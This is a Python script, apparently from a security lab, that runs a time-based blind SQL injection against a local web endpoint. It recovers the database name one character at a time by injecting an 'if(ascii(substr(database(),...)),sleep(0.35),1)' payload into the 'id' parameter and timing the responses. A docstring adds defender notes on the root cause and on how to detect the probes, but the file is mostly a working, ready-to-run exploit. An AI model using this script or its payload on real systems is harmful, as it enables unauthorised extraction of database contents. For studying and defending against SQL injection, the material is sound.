#!/usr/bin/env python
"""
Time-based blind SQL injection demonstration against a lab endpoint.

Each HTTP request asks the database a single yes/no question: "is the
character at position N of database() equal to ASCII code C?".  When the
answer is yes the injected expression calls sleep(0.35), so the answer is
read from how long the response takes, not from the response body.

Defender notes:
  * Root cause: presumably searchUsers2.php concatenates the `id` query
    parameter into a SQL statement (not visible here; confirm on the
    server side).  Bound parameters or strict integer validation of `id`
    remove the injection point.
  * Detection: every probe is a GET whose query string carries
    `if(ascii(substr(database(),` and `sleep(`; one client sends up to
    93 of them per character position, and exactly the matching ones are
    slower by the sleep duration.
"""
import requests
import signal
import sys
import time
import string
from pwn import *


def signal_handler(signal, frame):
    """Handle SIGINT (Ctrl+C): print a notice and exit with status 0."""
    # NOTE(review): the first parameter shadows the `signal` module inside
    # this function only; the module is not used in the body, so it is
    # harmless here.
    print('Saliendo con Ctrl+C!')
    sys.exit(0)


# Install the handler so Ctrl+C stops the run cleanly.
signal.signal(signal.SIGINT, signal_handler)

# Global settings
main_url = "http://192.168.1.121/searchUsers2.php"
# Assigned but not referenced anywhere else in this script.
characters = string.printable


def makeSQLI():
    """
    Recover up to nine characters of the current database name by timing.

    For positions 1..9 and ASCII codes 33..125 the function requests
    `main_url` with an injected `if(..., sleep(0.35), 1)` condition and
    measures the wall-clock duration of the request.  The first code whose
    request takes longer than 0.35 s is appended to the result and the
    search moves on to the next position.  A position where no code
    triggers the delay contributes nothing.

    Progress is reported through two pwntools progress loggers; nothing is
    returned.
    """
    # `log` is provided by the star import from pwn.
    brute_bar = log.progress("Fuerza bruta")
    brute_bar.status("Fuerza bruta en proceso")
    time.sleep(2)

    data_bar = log.progress(f"Datos extraídos")
    extracted_info = ""
    # Must stay equal to the sleep() argument embedded in the payload below.
    delay = 0.35

    for position in range(1, 10):
        for code in range(33, 126):
            candidate = chr(code)
            payload = "?id=1 and if(ascii(substr(database(),%d,1))=%d,sleep(0.35),1)" % (
                position, code)
            sqli_url = main_url + payload
            brute_bar.status(
                f"\n[i] Probando posición {position} el carácter: {candidate}")

            # The measured time covers the whole round trip, not only the
            # server-side sleep.
            started = time.time()
            requests.get(sqli_url)
            elapsed = time.time() - started

            if elapsed <= delay:
                continue

            # Slow response: the condition was true for this code.
            extracted_info += candidate
            data_bar.status(extracted_info)
            break


if __name__ == "__main__":
    makeSQLI()